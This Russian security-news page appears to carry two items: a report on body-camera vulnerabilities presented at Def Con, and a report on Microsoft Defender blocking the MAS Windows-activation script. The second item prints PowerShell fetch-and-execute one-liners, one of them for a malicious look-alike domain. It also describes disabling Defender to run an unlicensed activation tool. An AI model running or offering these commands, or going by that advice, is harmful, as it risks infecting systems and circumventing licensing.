Злоумышленники могут проникнуть в нагрудные камеры полиции

Злоумышленники могут проникнуть в нагрудные камеры полиции

Злоумышленники могут проникнуть в нагрудные камеры полиции

Использование нагрудных видеокамер сотрудниками правоохранительных органов всегда вызывало множество вопросов. С одной стороны мы имеем отличное средство фиксирования всего, что происходит с офицером полиции во время его службы — это помогает объяснить действия сотрудника в спорных ситуациях. С другой стороны — огромное количество уязвимостей в программном обеспечении, которое используется в таких камерах.

Джош Митчелл, главный консультант в области кибербезопасности из Nuix, выступая на Def Con, рассказал о способах получения удаленного доступа к записям нательных камер полицейских.

Таким образом, злоумышленники могут изменить или удалить потенциальные доказательства, которые будут проходить по тому или иному делу.

Митчелл выбрал пять разных моделей камер, разработанных специально для правоохранительных органов: Axon's Vievu, Patrol Eyes, Fire Cam, Digital Ally и CeeSc. За исключением Digital Ally, во всех моделях присутствовали недостатки безопасности, которые позволили исследователю удалить видеоматериал, редактировать объекты и внести изменения в структуры файлов, а потом незаметно загрузить измененные кадры.

Помимо этого, специалист нашел проблемы безопасности, связанные с мобильными приложениями, программным обеспечением и облачными сервисами, которые используют нагрудные камеры. И это не говоря уже об очень слабых учетных данных по умолчанию.

Ни одно из протестированных устройств не использует криптографическую защиту, ни один видеофайл не имеет цифровую подпись. Если правоохранительные органы планируют использовать эти камеры для сбора доказательств, отсутствие цифровой подписи может стать серьезной проблемой.

Митчелл также обратил внимание и на другую проблему — за исключением модели CeeSc, все тестируемые камеры оснащены Wi-Fi, а вот замаскировать свои IP-адреса они категорически не в состоянии.

Это означает, что злоумышленник может отслеживать местоположение владельца, что является серьезной проблемой безопасности для полиции, особенно если в этом время проводится секретная операция.

Митчелл поделился своими выводами с разработчиками камер, которые в настоящее время оценивают риски и работают над устранением проблем.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru